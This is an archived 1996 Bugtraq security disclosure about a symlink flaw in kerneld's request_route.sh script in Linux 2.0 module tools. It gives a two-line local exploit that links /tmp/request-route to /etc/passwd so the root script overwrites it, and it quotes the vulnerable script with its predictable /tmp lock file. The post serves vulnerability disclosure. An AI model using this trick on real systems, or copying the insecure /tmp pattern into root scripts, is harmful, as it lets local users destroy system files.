'[linux-security] Big security hole in kerneld's request_route'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [linux-security] Big security hole in kerneld's request_route
From:       "Igor Chudov  ()  home" <ichudov () algebra ! com>
Date:       1996-06-13 17:51:57
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I was just looking at sources of newly released linux 2.0.
In modules-1.3.69k, in kerneld's subdirectory, there is a file
request_route.sh (see below). It's supposed to run as root, whenever
a route is requested. It is supposed to start pppd or something like
that.

As it appears, it is possible to destroy system philes (such as /etc/passwd
and so on).

Condition: you must have a system which has "on-demand loading" of pppd,
whenever a route is requested.

Exploit:

you $ ln -s /etc/passwd /tmp/request-route
you$ ping 204.251.80.30

Internally kerneld starts request_route, request_route writes pid
to the symlinked file, and the file pointed to by symlink is overwritten.

Did I miss something?

        - Igor.


#! /bin/sh
LOCK=/tmp/request-route
PATH=/usr/sbin:$PATH    # for ppp-2.2*
export PATH

# Note: you are _not_ forced to use ppp!
# You can do whatever you want in order to satisfy the kernel route request.
# It might be a good idea to set up the route as the default route, in case
# you are using e.g. slip or plip or any other net driver...

#
# This script will be called from kerneld with the requested route as $1
# Create a chat script for your nameserver (as defined in /etc/resolv.conf)
#

chatfile=/etc/ppp/chat.$1

if [ -f $chatfile ]
then
        #
        # Tune your favourite parameters to pppd, including the idle-disconnect option.
        # Kerneld will be automatically triggered to load slhc.o and ppp.o
        #
        pppd connect "chat -f $chatfile" /dev/modem 38400 \
             idle-disconnect 600 modem defaultroute noipdefault \
             &  # let pppd detach itself whenever it wants to...

        #
        # Timer to be killed by ip-up, tunable! Check kerneld delay as well
        #
        sleep 60 &
        sleepid=$!
        echo $sleepid > $LOCK
        wait $sleepid
        rm -f $LOCK
        exit 0
else
        exit 1
fi

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMb+XDMJFmFyXKPzRAQHLzwP9HAD/WCkirGpBUjLXIdcmhQcQMf3eJMDk
Y5tU/7KkXR2afOmEncZEQs57FOhHaVtDiAMZ0B25Dn0ef6qhbYSS3wjzjh2V8m0d
OHxnoRHTSApM1mQA2WFPYkzfqmFHXzQBHur6xNkl6JcJ9FiLFSQp3cQBjgcafX0C
CaDXkJNTNSI=
=8zfD
-----END PGP SIGNATURE-----

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic